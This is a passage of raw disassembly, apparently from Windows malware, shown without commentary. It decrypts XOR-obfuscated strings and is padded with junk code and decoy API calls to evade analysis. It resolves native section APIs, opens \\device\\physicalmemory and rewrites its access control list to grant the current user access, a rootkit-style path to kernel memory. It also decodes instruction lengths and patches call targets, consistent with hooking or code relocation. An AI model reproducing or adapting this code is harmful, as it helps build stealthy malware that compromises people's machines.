var_A = word ptr -0Ah
var_8 = byte ptr -8
var_5 = byte ptr -5
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea edi, [ebp+var_5]
lea esi, aGxK ; "gx%K"
mov ecx, 5
rep movsb
lea edi, [ebp+var_8]
lea esi, aJv ; "jV"
mov ecx, 3
rep movsb
mov ebx, [ebp+arg_4]
jmp short loc_401C07
; ---------------------------------------------------------------------------
loc_401BB1: ; CODE XREF: sub_401B83+8B�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0Dh
jnz short loc_401C06
lea edi, [ebp+var_D]
lea esi, aLkw ; "'lkW"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
mov edx, ebx
sub edx, eax
push edx
mov edx, [ebp+arg_0]
add edx, eax
push edx
push [ebp+arg_8]
call sub_40C998
add esp, 0Ch
lea edi, [ebp+var_10]
lea esi, asc_43C2A1 ; ":|"
mov ecx, 3
rep movsb
mov eax, ebx
sub eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
mov byte ptr [edx+eax], 0
mov eax, ebx
add eax, 2
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C06: ; CODE XREF: sub_401B83+35�j
inc ebx
loc_401C07: ; CODE XREF: sub_401B83+2C�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401BB1
cmp [ebp+arg_4], 0
jz short loc_401C41
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401C41
mov eax, ebx
dec eax
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0Ah
jnz short loc_401C41
mov ax, word_43C2A4
mov [ebp+var_A], ax
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
inc eax
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C41: ; CODE XREF: sub_401B83+91�j
; sub_401B83+9A�j ...
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_40C6E0 ; lstrlenA
mov ebx, eax
or ebx, ebx
jz short loc_401C7C
mov dword ptr [ebp-0Ch], 1C80h
add dword ptr [ebp-0Ch], 2EFDh
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
push [ebp+arg_8]
call sub_40C45C
call sub_40C5D8 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
add eax, ebx
jmp short loc_401C7E
; ---------------------------------------------------------------------------
loc_401C7C: ; CODE XREF: sub_401B83+CE�j
xor eax, eax
loc_401C7E: ; CODE XREF: sub_401B83+81�j
; sub_401B83+BC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401B83 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2B0
lea eax, ds:437140h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_401CC0
; ---------------------------------------------------------------------------
loc_401CA9: ; CODE XREF: .text:00401CC2�j
mov eax, dword_43C2B0
add eax, edi
lea eax, ds:437140h[eax]
movsx edx, byte ptr [eax]
xor edx, 22h
mov [eax], dl
inc edi
loc_401CC0: ; CODE XREF: .text:00401CA7�j
cmp edi, esi
jl short loc_401CA9
mov eax, dword_43C2B0
add eax, esi
mov byte ptr ds:dword_437140[eax], 0
mov edi, dword_43C2B0
mov eax, edi
add eax, 5
add eax, esi
mov dword_43C2B0, eax
add dword_43C2B0, 3
cmp dword_43C2B0, 0DEDh
jle short loc_401CFF
and dword_43C2B0, 0
loc_401CFF: ; CODE XREF: .text:00401CF6�j
and dword ptr [ebp-4], 0
lea eax, dword_437140[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D0D proc near ; CODE XREF: sub_4028B9+97�p
var_25 = byte ptr -25h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
var_16 = byte ptr -16h
var_10 = dword ptr -10h
var_C = word ptr -0Ch
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_3 = word ptr -3
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
call sub_40C518 ; GetProcessHeap
inc dword_43C230
mov ax, word_43C2B4
mov [ebp+var_3], ax
mov ebx, [ebp+arg_0]
and ds:dword_40DFD4, 0
and ds:dword_41EB58, 0
and ds:dword_41EB70, 0
and ds:dword_40F088, 0
mov ds:dword_41B774, 4
mov ds:dword_414EE4, 4
loc_401D5E: ; CODE XREF: sub_401D0D+136�j
; sub_401D0D+162�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_414EE0, al
movzx eax, ds:byte_414EE0
or eax, eax
jl loc_402008
cmp eax, 0FFh
jg loc_402008
jmp off_43C2C4[eax*4]
; ---------------------------------------------------------------------------
mov [ebp+var_9], 0D6h
movzx eax, [ebp+var_9]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_9], al
loc_401D9A: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
or byte ptr ds:dword_41EB58, 40h
jmp loc_402008
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401DAC: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_20], eax
add ds:dword_41EB70, eax
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401DC7: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
or byte ptr ds:dword_41EB58, 40h
test byte ptr [ebx], 38h
jnz loc_402008
call sub_40C548 ; GetTickCount
loc_401DDC: ; CODE XREF: sub_401D0D+75�j
; DATA XREF: .data:0043C2D4�o ...
test ds:byte_414EE0, 1
jz short loc_401DF5
mov eax, ds:dword_41B774
add ds:dword_41EB70, eax
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401DF5: ; CODE XREF: sub_401D0D+D6�j
inc ds:dword_41EB70
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401E00: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
inc ds:dword_41EB70
jmp loc_402008
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401E11: ; CODE XREF: sub_401D0D+75�j
; DATA XREF: .data:0043C35C�o ...
test byte ptr ds:dword_41EB58, 10h
jz short loc_401E21
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_401E21: ; CODE XREF: sub_401D0D+10B�j
lea edi, [ebp+var_16]
lea esi, aRg ; "~ /rG"
mov ecx, 3
rep movsw
or byte ptr ds:dword_41EB58, 10h
mov al, ds:byte_414EE0
mov ds:byte_40F094, al
jmp loc_401D5E
; ---------------------------------------------------------------------------
loc_401E48: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
test byte ptr ds:dword_41EB58, 4
jz short loc_401E58
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_401E58: ; CODE XREF: sub_401D0D+142�j
lea edi, [ebp+var_19]
lea esi, aOv ; "O"
mov ecx, 3
rep movsb
or byte ptr ds:dword_41EB58, 4
jmp loc_401D5E
; ---------------------------------------------------------------------------
loc_401E74: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
test byte ptr ds:dword_41EB58, 8
jz short loc_401E84
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_401E84: ; CODE XREF: sub_401D0D+16E�j
call sub_40C5D8 ; IsDebuggerPresent
or byte ptr ds:dword_41EB58, 8
mov al, ds:byte_414EE0
mov ds:byte_41FC70, al
jmp loc_401D5E
; ---------------------------------------------------------------------------
loc_401E9F: ; CODE XREF: sub_401D0D+75�j
; DATA XREF: .data:0043C45C�o
test byte ptr ds:dword_41EB58, 1
jz short loc_401EAF
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_401EAF: ; CODE XREF: sub_401D0D+199�j
call sub_40C4C4 ; GetCurrentThreadId
or byte ptr ds:dword_41EB58, 1
mov ds:dword_41B774, 2
jmp loc_401D5E
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401D0D+75�j
; DATA XREF: .data:0043C460�o
test byte ptr ds:dword_41EB58, 2
jz short loc_401EDA
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_401EDA: ; CODE XREF: sub_401D0D+1C4�j
mov [ebp+var_10], 2133h
inc [ebp+var_10]
or byte ptr ds:dword_41EB58, 2
mov ds:dword_414EE4, 2
jmp loc_401D5E
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401F00: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
inc ds:dword_41EB70
or byte ptr ds:dword_41EB58, 40h
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401F12: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
mov eax, ds:dword_41B774
add ds:dword_41EB70, eax
or byte ptr ds:dword_41EB58, 40h
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401F29: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
mov eax, ds:dword_41B774
add eax, 2
add ds:dword_41EB70, eax
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401F3C: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
mov eax, ds:dword_414EE4
add ds:dword_40F088, eax
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401F4C: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
mov eax, ds:dword_41B774
add ds:dword_41EB70, eax
jmp loc_402008
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401F62: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
add ds:dword_41EB70, 2
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401F6E: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
add ds:dword_41EB70, 3
jmp loc_402008
; ---------------------------------------------------------------------------
loc_401F7A: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+2AA�j
; DATA XREF: ...
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_401F81: ; CODE XREF: sub_401D0D+75�j
; DATA XREF: .data:0043C300�o
or byte ptr ds:dword_41EB58, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42FC80, al
movzx eax, ds:byte_42FC80
or eax, eax
jl short loc_402001
cmp eax, 0Bh
jg short loc_401FA9
jmp off_43C6C4[eax*4]
; ---------------------------------------------------------------------------
loc_401FA9: ; CODE XREF: sub_401D0D+293�j
cmp eax, 80h
jl short loc_402001
cmp eax, 0CFh
jg short loc_402001
jmp off_43C4F4[eax*4]
; ---------------------------------------------------------------------------
call sub_40C554 ; GetVersion
loc_401FC3: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+295�j ...
or byte ptr ds:dword_41EB58, 40h
mov [ebp+var_25], 0FCh
movzx eax, [ebp+var_25]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_25], al
jmp short loc_402008
; ---------------------------------------------------------------------------
inc dword_43C230
jmp short loc_402008
; ---------------------------------------------------------------------------
loc_401FE5: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+295�j ...
mov eax, ds:dword_41B774
add ds:dword_41EB70, eax
jmp short loc_402008
; ---------------------------------------------------------------------------
loc_401FF2: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+295�j ...
inc ds:dword_41EB70
or byte ptr ds:dword_41EB58, 40h
jmp short loc_402008
; ---------------------------------------------------------------------------
loc_402001: ; CODE XREF: sub_401D0D+75�j
; sub_401D0D+28E�j ...
xor eax, eax
jmp loc_4021A0
; ---------------------------------------------------------------------------
loc_402008: ; CODE XREF: sub_401D0D+64�j
; sub_401D0D+6F�j ...
inc dword_43C230
test byte ptr ds:dword_41EB58, 40h
jz loc_402120
call sub_40C548 ; GetTickCount
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_430C60, al
call sub_40C518 ; GetProcessHeap
movzx eax, ds:byte_430C60
and eax, 0C0h
mov [ebp+var_9], al
movzx eax, ds:byte_430C60
and eax, 7
mov [ebp+var_A], al
movzx eax, [ebp+var_9]
cmp eax, 0C0h
jz loc_402120
mov [ebp+var_C], 4B49h
sub [ebp+var_C], 2DCFh
cmp [ebp+var_9], 40h
jnz short loc_402072
inc ds:dword_40F088
loc_402072: ; CODE XREF: sub_401D0D+35D�j
movzx eax, [ebp+var_9]
cmp eax, 80h
jnz short loc_402088
mov eax, ds:dword_414EE4
add ds:dword_40F088, eax
loc_402088: ; CODE XREF: sub_401D0D+36E�j
mov word ptr [ebp+var_10+2], 1345h
sub word ptr [ebp+var_10+2], 1AC8h
cmp ds:dword_414EE4, 2
jnz short loc_4020C3
mov byte ptr [ebp+var_10+1], 5Ch
movzx eax, byte ptr [ebp+var_10+1]
mov edx, eax
add edx, eax
mov eax, edx
mov byte ptr [ebp+var_10+1], al
cmp [ebp+var_9], 0
jnz short loc_402120
cmp [ebp+var_A], 6
jnz short loc_402120
add ds:dword_40F088, 2
jmp short loc_402120
; ---------------------------------------------------------------------------
loc_4020C3: ; CODE XREF: sub_401D0D+38E�j
mov eax, dword_43C2BF
mov [ebp-13h], eax
cmp [ebp+var_A], 4
jnz short loc_402105
mov dword ptr [ebp-18h], 368Bh
add dword ptr [ebp-18h], 2C53h
or byte ptr ds:dword_41EB58, 80h
mov [ebp+var_19], 0D4h
sub [ebp+var_19], 96h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_41B770, al
movzx eax, ds:byte_41B770
and eax, 7
mov [ebp+var_A], al
loc_402105: ; CODE XREF: sub_401D0D+3C2�j
cmp [ebp+var_A], 5
jnz short loc_402118
cmp [ebp+var_9], 0
jnz short loc_402118
add ds:dword_40F088, 4
loc_402118: ; CODE XREF: sub_401D0D+3FC�j
; sub_401D0D+402�j
mov byte ptr [ebp+var_10+1], 5
add byte ptr [ebp+var_10+1], 1
loc_402120: ; CODE XREF: sub_401D0D+308�j
; sub_401D0D+347�j ...
and ds:dword_40F08C, 0
jmp short loc_402141
; ---------------------------------------------------------------------------
loc_402129: ; CODE XREF: sub_401D0D+43F�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F08C
mov al, [eax]
mov ds:byte_414ED8[edx], al
inc ds:dword_40F08C
loc_402141: ; CODE XREF: sub_401D0D+41A�j
mov eax, ds:dword_40F088
cmp ds:dword_40F08C, eax
jb short loc_402129
mov [ebp+var_1], 0E3h
movzx eax, [ebp+var_1]
imul eax, 3A17h
mov [ebp+var_1], al
and ds:dword_40F08C, 0
jmp short loc_402180
; ---------------------------------------------------------------------------
loc_402168: ; CODE XREF: sub_401D0D+47E�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F08C
mov al, [eax]
mov ds:byte_43A3A0[edx], al
inc ds:dword_40F08C
loc_402180: ; CODE XREF: sub_401D0D+459�j
mov eax, ds:dword_41EB70
cmp ds:dword_40F08C, eax
jb short loc_402168
inc dword_43C230
mov eax, ebx
sub eax, [ebp+arg_0]
mov ds:dword_40DFD4, eax
xor eax, eax
inc eax
loc_4021A0: ; CODE XREF: sub_401D0D+10F�j
; sub_401D0D+146�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401D0D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43CF2C
lea eax, ds:4186B0h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_4021E3
; ---------------------------------------------------------------------------
loc_4021CC: ; CODE XREF: .text:004021E5�j
mov eax, dword_43CF2C
add eax, edi
lea eax, ds:4186B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 79h
mov [eax], dl
inc edi
loc_4021E3: ; CODE XREF: .text:004021CA�j
cmp edi, esi
jl short loc_4021CC
mov dword ptr [ebp-4], 3DDh
mov eax, dword_43CF2C
add eax, esi
mov byte ptr ds:dword_4186B0[eax], 0
xor edi, edi
mov edi, dword_43CF2C
add dword_43CF2C, 3
mov eax, dword_43CF2C
add eax, 4
add eax, esi
mov dword_43CF2C, eax
add dword_43CF2C, 2
cmp dword_43CF2C, 0E06h
jle short loc_402235
and dword_43CF2C, 0
loc_402235: ; CODE XREF: .text:0040222C�j
mov dword ptr [ebp-8], 29h
lea eax, dword_4186B0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402246 proc near ; CODE XREF: sub_402AD6+2A�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = word ptr -4
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_1], 30h
add [ebp+var_1], 2
push offset aNtdll_dll ; "ntdll.dll"
call sub_40C500 ; GetModuleHandleA
mov ebx, eax
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push ebx
call sub_40C50C ; GetProcAddress
mov ds:dword_430C58, eax
mov eax, dword_43CFE6
mov [ebp+var_8], eax
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push ebx
call sub_40C50C ; GetProcAddress
mov ds:dword_41DA78, eax
mov [ebp+var_4], 387h
movzx eax, [ebp+var_4]
imul eax, 946h
mov [ebp+var_4], ax
push offset aNtopensection ; "NtOpenSection"
push ebx
call sub_40C50C ; GetProcAddress
mov ds:dword_41B77C, eax
lea edi, [ebp+var_10]
lea esi, a4efo@g ; "4EFo@g^"
movsd
movsd
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push ebx
call sub_40C50C ; GetProcAddress
mov ds:dword_41EB68, eax
call sub_40C4C4 ; GetCurrentThreadId
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push ebx
call sub_40C50C ; GetProcAddress
mov ds:dword_430C54, eax
pop edi
pop esi
pop ebx
leave
retn
sub_402246 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022E4 proc near ; CODE XREF: sub_402AD6+194�p
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_77 = dword ptr -77h
var_73 = byte ptr -73h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_56 = word ptr -56h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
push edi
mov [ebp+var_53], 5Ch
add [ebp+var_53], 1
mov [ebp+var_54], 2
add [ebp+var_54], 1
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_60]
push eax
call ds:dword_430C58
mov ebx, 7158h
mov eax, ebx
add eax, ebx
mov ebx, eax
mov [ebp+var_18], 18h
call sub_40C548 ; GetTickCount
and [ebp+var_14], 0
mov [ebp+var_56], 7C6h
add [ebp+var_56], 6E76h
lea eax, [ebp+var_60]
mov [ebp+var_10], eax
call sub_40C548 ; GetTickCount
mov [ebp+var_C], 40h
mov eax, dword_43CFF2
mov [ebp+var_6C], eax
xor eax, eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov [ebp+var_30], eax
mov [ebp+var_2C], eax
mov eax, dword_43CFF6
mov [ebp+var_70], eax
mov [ebp+var_28], 1
call sub_40C4E8 ; RtlGetLastWin32Error
mov [ebp+var_24], 1
lea edi, [ebp+var_73]
lea esi, word_43CFFA
mov ecx, 3
rep movsb
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
mov [ebp+var_52], 6768h
movzx eax, [ebp+var_52]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52], ax
mov [ebp+var_50], 2 ; DATA XREF: sub_44041D+2F�o
mov ebx, 7DBAh
mov eax, 0E10h
mul ebx
mov [ebp+var_80], eax
mov ebx, eax
mov [ebp+var_4C], 1
call sub_40C4C4 ; GetCurrentThreadId
and [ebp+var_48], 0
mov eax, dword_43CFFD
mov [ebp+var_77], eax
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+var_1C]
push eax
call ds:dword_41B77C
call sub_40C4E8 ; RtlGetLastWin32Error
lea eax, [ebp+var_7C]
push eax
push 0
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C8FC ; GetSecurityInfo
lea eax, [ebp+var_68]
push eax
push [ebp+var_64]
lea eax, [ebp+var_50]
push eax
mov eax, 10h
sub eax, dword_43CF28
push eax
call sub_40C914 ; SetEntriesInAclA
call sub_40C5D8 ; IsDebuggerPresent
push 0
push [ebp+var_68]
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C908 ; SetSecurityInfo
call sub_40C554 ; GetVersion
push [ebp+var_1C]
call sub_40C530 ; CloseHandle
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_18]
push eax
push [ebp+var_50]
lea eax, [ebp+var_1C]
push eax
call ds:dword_41B77C
mov ebx, 5177h
inc ebx
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
leave
retn
sub_4022E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40247C proc near ; CODE XREF: sub_402AD6+251�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
call sub_40C554 ; GetVersion
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
and [ebp+var_8], 0
xor edx, edx
mov [ebp+var_10], edx
mov [ebp+var_14], eax
push 4
push 0
push 1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push 0
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41EB68
call sub_40C5D8 ; IsDebuggerPresent
mov eax, [ebp+var_8]
leave
retn
sub_40247C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024CB proc near ; CODE XREF: sub_402AD6+320�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C548 ; GetTickCount
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_41DA78
call sub_40C4C4 ; GetCurrentThreadId
pop ebp
retn
sub_4024CB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2A2h
push esi
push dword ptr [ebp+8]
mov eax, dword_43D00C
lea eax, ds:412CC0h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov dword ptr [ebp-8], 178h
xor edi, edi
jmp short loc_402531
; ---------------------------------------------------------------------------
loc_40251A: ; CODE XREF: .text:00402533�j
mov eax, dword_43D00C
add eax, edi
lea eax, ds:412CC0h[eax]
movsx edx, byte ptr [eax]
xor edx, 1Bh
mov [eax], dl
inc edi
loc_402531: ; CODE XREF: .text:00402518�j
cmp edi, esi
jl short loc_40251A
mov eax, dword_43D00C
add eax, esi
mov byte ptr ds:dword_412CC0[eax], 0
mov edi, dword_43D00C
mov eax, edi
lea eax, [eax+esi+5]
mov dword_43D00C, eax
cmp eax, 0DC8h
jle short loc_402563
and dword_43D00C, 0
loc_402563: ; CODE XREF: .text:0040255A�j
lea eax, dword_412CC0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40256D proc near ; CODE XREF: sub_4028B9+210�p
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_1], 1Fh
movzx eax, [ebp+var_1]
imul eax, 273Eh
mov [ebp+var_1], al
xor ebx, ebx
loc_402589: ; CODE XREF: sub_40256D+341�j
mov [ebp+var_4], 7BD1h
movzx eax, [ebp+var_4]
imul eax, 2805h
mov [ebp+var_4], ax
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_4025E3
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_4025E3
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_4025E3
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_4025E3
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_4028B4
loc_4025E3: ; CODE XREF: sub_40256D+3D�j
; sub_40256D+4A�j ...
call sub_40C4C4 ; GetCurrentThreadId
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
call sub_40C4B8 ; GetCurrentProcessId
mov [ebp+var_2], 0
loc_402604: ; CODE XREF: sub_40256D+19D�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_2]
imul edx, 0Ch
movzx edx, byte_43D0AC[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_4026F0
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026F0
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026F0
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026F0
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz loc_4026F0
call sub_40C4E8 ; RtlGetLastWin32Error
movzx eax, [ebp+var_2]
imul eax, 0Ch
push off_43D0B4[eax]
call sub_40C500 ; GetModuleHandleA
movzx edi, [ebp+var_2]
imul edi, 0Ch
push off_43D0B0[edi]
push eax
call sub_40C50C ; GetProcAddress
mov [ebp+var_C], eax
call sub_40C5D8 ; IsDebuggerPresent
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_C]
sub eax, 4
mov [ebp+var_10], eax
mov ax, word_43D118
mov [ebp+var_12], ax
mov eax, [ebp+arg_4]
mov edx, ecx
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_10]
mov ds:1[eax], edx
mov [ebp+var_6], 7CF5h
movzx eax, [ebp+var_6]
imul eax, 6E98h
mov [ebp+var_6], ax
jmp short loc_40270F
; ---------------------------------------------------------------------------
loc_4026F0: ; CODE XREF: sub_40256D+AF�j
; sub_40256D+BE�j ...
movzx eax, [ebp+var_2]
imul eax, 0Ch
cmp off_43D0B0[eax], 0
jz short loc_40270F
call sub_40C4E8 ; RtlGetLastWin32Error
add [ebp+var_2], 1
jmp loc_402604
; ---------------------------------------------------------------------------
loc_40270F: ; CODE XREF: sub_40256D+181�j
; sub_40256D+192�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_402794
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_402794
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_402794
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_402794
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_402758
cmp edx, 0BEh
jz short loc_402758
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_402794
loc_402758: ; CODE XREF: sub_40256D+1D6�j
; sub_40256D+1DE�j
mov [ebp+var_6], 7567h
movzx eax, [ebp+var_6]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_6], ax
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
mov [ebp+var_C], 4D69h
mov eax, [ebp+var_C]
mov edx, eax
add edx, eax
mov [ebp+var_C], edx
loc_402794: ; CODE XREF: sub_40256D+1A9�j
; sub_40256D+1B2�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 2
jnz loc_402830
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 2
jnz loc_402830
mov edx, ebx
sub edx, 2
